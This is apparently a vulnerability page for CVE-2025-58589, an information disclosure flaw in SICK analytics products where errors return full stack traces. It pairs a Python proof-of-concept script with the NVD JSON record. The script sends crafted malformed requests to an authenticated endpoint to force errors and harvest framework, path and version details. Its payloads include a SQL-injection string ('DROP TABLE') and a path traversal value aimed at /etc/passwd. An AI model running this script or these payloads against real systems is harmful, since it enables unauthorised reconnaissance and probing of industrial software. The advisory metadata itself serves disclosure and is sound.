CVE-2025-58589

# CVE-2025-58589 PoC - SICK Product Stack Trace Information Disclosure # This PoC demonstrates how to trigger error conditions to obtain stack trace information import requests import json # Target configuration TARGET_URL = "https://target-sick-product.example.com/api/endpoint" AUTH_TOKEN = "authenticated_session_token" # Requires high privilege (PR:H) # Headers with authentication headers = { "Authorization": f"Bearer {AUTH_TOKEN}", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher/1.0)" } def trigger_stack_trace_disclosure(url, headers): """ Attempt to trigger application errors that may reveal stack traces. Various malformed requests are sent to provoke exception handling. """ payloads = [ # Malformed JSON payload {"data": "{{invalid_json"}, # Null pointer trigger {"parameter": None, "action": "process"}, # Type confusion {"id": {"nested": "object"}, "expected": "integer"}, # Buffer overflow attempt {"input": "A" * 10000}, # SQL injection-like payload to trigger DB error {"query": "'; DROP TABLE--"}, # Path traversal to trigger file not found {"file": "../../../etc/passwd"}, ] for i, payload in enumerate(payloads): print(f"\n[*] Attempt {i+1}: Sending payload to trigger error...") try: response = requests.post(url, headers=headers, json=payload, timeout=10) # Check if response contains stack trace indicators stack_indicators = [ "Exception", "Traceback", "at line", ".java:", ".py:", "Stack trace", "Caused by:", "at com.sick.", "at org.springframework." ] for indicator in stack_indicators: if indicator.lower() in response.text.lower(): print(f"[+] Stack trace detected! Indicator: {indicator}") print(f"[+] Response excerpt:\n{response.text[:2000]}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[-] No stack trace disclosure detected") return None def analyze_disclosed_info(stack_trace): """ Analyze the disclosed stack trace for sensitive information. """ if not stack_trace: return print("\n[*] Analyzing disclosed information...") sensitive_patterns = { "Framework": ["springframework", "django", "flask", "struts", "tomcat"], "Database": ["mysql", "postgresql", "oracle", "hibernate", "jdbc"], "File Paths": ["/opt/", "/var/", "C:\\\\", "/home/"], "Class Names": ["com.sick.", "de.sick.", "sick.ag."], "Version Info": ["version", "v1.", "v2.", "build"] } for category, patterns in sensitive_patterns.items(): for pattern in patterns: if pattern.lower() in stack_trace.lower(): print(f"[+] Detected {category}: {pattern}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-58589 - Stack Trace Information Disclosure PoC") print("Affected: SICK AG Industrial Products") print("CVSS: 2.7 (LOW)") print("=" * 60) result = trigger_stack_trace_disclosure(TARGET_URL, headers) if result: analyze_disclosed_info(result)

{"cve": {"id": "CVE-2025-58589", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:35.720", "lastModified": "2026-01-27T19:45:57.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When an error occurs in the application a full stacktrace is provided to the user. The stacktrace lists class and method names as well as other internal information. An attacker thus receives information about the technology used and the structure of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}